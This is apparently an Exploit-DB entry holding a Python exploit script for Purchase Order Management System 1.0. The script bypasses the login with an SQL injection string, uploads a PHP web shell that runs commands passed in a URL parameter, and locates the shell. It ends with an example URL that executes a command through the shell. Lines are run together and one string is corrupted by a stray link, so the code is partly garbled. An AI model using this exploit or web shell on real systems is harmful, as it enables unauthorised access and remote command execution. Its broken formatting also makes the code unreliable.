# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload# Date: 2021-09-14 # Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html# Version: v1.0# Tested on: Windows 10 - XAMPP Server # [ About the Purchase Order Management System ] :#This Purchase Order Management System can store the list of all company's,#suppliers for easily retrieving the suppliers' data upon generating the purchase order.#It also stores the list of Items that the company possibly purchased from their suppliers.#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. #Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.#!/bin/env python3import requests
import time
import sys
from colorama import Fore, Style
iflen(sys.argv)!=2:print('''
###########################################################
#Purchase Order Management System 1.0 - Remote File Upload#
#BY:Aryan Chehreghani #
#Team:TAPESH DIGITAL SECURITY TEAM IRAN #
# mail:aryanchehreghani@yahoo.com #
#-+-USE:python script.py <target url> #
# [+]Example:python3 script.py http://127.0.0.1/#
###########################################################
''')else:try:
url = sys.argv[1]print()print('[*] Trying to login...')
time.sleep(1)
login = url +'/classes/Login.php?f=login'
payload_name ="shell.php"
payload_file =r"""<?php @system($_GET['tapesh']); ?>"""
session = requests.session()
post_data ={"username":"'=''or'","password":"'=''or'"}
user_login = session.post(login, data=post_data)
cookie = session.cookies.get_dict()if user_login.text =='{"status":"success"}':print('['+ Fore.GREEN +'+'+ Style.RESET_ALL +']'+' Successfully Signed In!')
upload_url = url +"/classes/Users.php?f=save"
cookies = cookie
headers ={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","X-Requested-With":"XMLHttpRequest","Content-Type":"multipart/form-data; boundary=---------------------------221231088029122460852571642112","Origin":"http://localhost","Connection":"close","Referer":"http://localhost/leave_system/admin/?page=user"}
data ="-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+ payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n "+ payload_file +"\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"print('[*] Trying to shell...')
time.sleep(2)try:print('['+ Fore.GREEN +'+'+ Style.RESET_ALL +']'+' Shell Uploaded!')
upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
upload_check =f'{url}/uploads'
r = requests.get(upload_check)if payload_name in r.text:
payloads = r.text.split('<a href="https://www.exploit-db.com/exploits/50292/')for load in payloads:if payload_name in load:
payload = load.split('"')
payload = payload[0]else:passelse:
exit()except:print("Upload failed try again\n")
exit()try:print("Check Your Target ;)\n")except:print("Failed to find shell\n")else:print("Login failed!\n")except:print("Something Went Wrong!\n")##########################################################FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir
